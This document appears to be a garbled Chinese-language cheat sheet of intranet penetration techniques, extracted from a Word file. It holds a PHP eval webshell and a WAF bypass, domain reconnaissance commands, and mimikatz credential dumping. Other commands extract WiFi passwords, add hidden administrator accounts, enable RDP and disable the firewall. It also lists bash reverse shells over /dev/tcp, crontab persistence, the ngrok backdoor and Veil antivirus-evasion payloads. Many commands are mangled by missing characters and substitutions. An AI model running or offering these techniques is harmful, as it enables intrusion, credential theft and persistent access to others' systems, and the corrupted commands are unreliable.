2023内网渗透知识点总结.docx

内网渗透知识点总结获取webshell进内网测试主站，搜WooyUn历史洞未发现历史洞，github,svn,目录扫描未发现敏感信息，无域传送，端口只开了80端口，找到后台地址，想爆破后台，验证码后台验证，一次性，用ocr识别，找账号，通过google,baidu,bing等搜索，相关邮箱，域名等加常用密码组成字典，发现用户手册，找账号，发现未打码信息，和默认密码，试下登陆成功，找后台，上传有dog,用含有一句话的txt文件'<?phpeval($_POSTfCmd');?>'打包为zip,php文件<?phpinclude'phar:/1.zip1.txt,;?>'即可，c刀被拦，修改config,ini文件php_makeeval(calIuserfuncarray(base64decode,array($_POSTaction);用回调函数，第一个为函数名，二个为传的参数前期信息收集queryuser|qwinsta查看当前在线用户netuser查看本机用户netuser/domain查看域用户netview&netgroupdomaincomputers"domain查看当前域计算机列表第二个查的更多netview/domain查看有几个域netviewde查看de域内共享文件netgroup/domain查看域里面的组netgroupz/domainadmins*/domain查看域管netIocalgroupadministrators/domain/这个也是查域管，是升级为域控时，本地账户也成为域管netgroupdomaincontrol1s,/domain域控nettime/domainnetconfigworkstation当前登录域-计算机名-用户名netuse域控（如）password/user:username相当于这个帐号登录域内主机，可访问资源ipconfigsysteminfotasklist/svetasklist/Sip/Udomainusername/P/V查看远程计算机tasklistnetIocalgroupadministrators&&whoami查看当前是不是属于管理组netstat-anonltest/delist:xx查看域控whoami/all查看Mandatory1.abeluac级别和sid号netsessoin查看远程连接session（需要管理权限）netshare共享目录cmdkey/1查看保存登陆凭证echo%logonserver%查看登陆域spn-1administratorspn记录Set环境变量dsqueryserver-查找目录中的ADDC/1.DS实例dsqueryuser-查找目录中的用户dsquerycomputer查询所有计算机名称windows2003dir/s*.exe查找指定目录下及子目录下没隐藏文件arp-a发现远程登录密码等密码netpass.exe下载地址：IImimikatz.exeprivilege:debugtoken:elevateIsadump:samIsadump:secretsexitwifi密码：InetshwIanshowprofiIe查处wifi名netshwIanshowprofileWiFi-namekey=clear获取对应wifi的密码ie代理regqueryHKEYJJSERSS-1-5-21-1563011143-1171140764-1273336227-500SoftwareMicrosoftWindowsCurrentVersionInternetSettingszz/vProxyServerregquery，ZHKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternetSettingsz,pac代理regqueryHKEYJJSERSS-1-5-21-1563011143-1171140764-1273336227-500SoftwareMicrosoftWindowsCurrentVersionInternetSettings*/vAutoConfigUR1./引子tstmai1powershell-11ishang其他常用命令pingicmp连通性vps-ipdns连通性dig©vps-curlvps:8080http连通性tracertbitsadmin/transfernhttp:/ipxx.exeC:windowstempx.exe一种上传文件=2008fuser-nvtcp80查看端口pidrdesktop-uusernameipIinux连接win远程桌面(有可能不成功)wherefilewin查找文件是否存在找路径，1.inUX下使用命令find-name*.jsp来查找，Windows下，使用for/rc:windowstemp%iin(filelsss.dmp)do©echo%inetstat-apngrep8888kill-9PID查看端口并kill远程登录内网主机判断是内网，还是外网，内网转发到VPSInetstat-ano没有开启3389端口，复查下tasklistsvc,查SVChOSt.exe对应的TermService的pid,看netstat相等的pid即3389端口.在主机上添加账号Inetuseradmin1admin1/add&netIocalgroupadministratorsadmin1/add如不允许远程连接，修改注册表REGADD,HK1.MSYSTEMCurrentControlSetControlTerminalServer7"vfDenyTSConnections/tREG_DWORD/d00000000/fREGADD"HKEY_1.OCA1._MACHINESYSTEMCurrentControlSetControlTerminalServerWinStationsRDP-Tcpyz/vPortNumber/1REG_DWORD/d0x00000d3d/f如果系统未配置过远程桌面服务，第一次开启时还需要添加防火墙规则，允许3389端口，命令如下：netshadvfirewal1firewal1addrulename=zzRemoteDesktopzzprotocol=TCPdir=inlocalport=3389action=allow关闭防火墙netshfirewallsetopmodemode=disable3389user无法添加：http:/www.91ri.org5866.html*隐藏win账户*开启sys权限cmd:IEX(New-ObjectNet.WebClient).DownloadString(,adduser并隐藏：IIEX(New-ObjectNet.WebClient).DownloadString(,winserver有密码强度要求，改为更复杂密码即可：渗透技巧Windows系统的帐户隐藏Ihttps:/3gstudent.github.io3gstudent.github.io%E%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Windows%E7%B3%BB%E7%BB%9F%E7%9A%84%E5%B8%90%E6%88%B7%E9%9%90%E8%97%8F/windows的RDP连接记录：httprcoil.me201805%E5%85%B3%E4%BA%8Ewindows%E7%9A%84RDP%E8%BF%9E%E6%8E%A5%E8%AE%B0%E5%BD%95/Iinuxbashbash-i>&devtcp10.O.O.1/80800>&1bash-i交互的shell标准错误输出到标准输出'devtcp10.O.O.1/8080建立socketipport'0/1'标准输入到标准输出I(crontab-1;echo,*/60*exec9OdevtcpIP/port;exec0<&9;exec1>&92>&1;binbash-noprofiIe-i,)crontab-猥琐版I(crontab-1;printf"*60*exec90devtcpIP/PORT;exec0<&9;exec1>&92>&1;/bin/bash-noprofiIe-i;rnocrontabforwhoami%100c11")Icrontab-详细介绍Ingrok-backdoorGrok-backdoor是一个简单的基于python的后门，它使用Ngrok隧道进行通信。Ngrok后门可以使用Pyinstaller生成windows,Iinux和mac二进制文件。虽然免杀，但如果开win防火墙会提示，生成后门时会询问是否捆绑ngrok,选择no时，在被攻击机执行时需联网下载ngrok,运行后，telnet连接即可.veil这里，安装问题有点多，我用kali-2018-32安装成功，先安装下列依赖，后按照官方即可。apt-getinstall1ibncurses5*apt-getinstallIibavutil55*apt-getinstal1gcc-mingw-w64*apt-getinstal1wine32生成SheIl./Veil,pyuse1usecmeterpreterrev_tcp在win用mingw下gcc编译bypass360gcc-ov.exev.c-lws232使用之前生成的veil,rcmsfconsole-rveil,rc一句话开启http服务，虚拟机里开启，在外访问虚拟机ip即可下载虚拟机文件：python-mS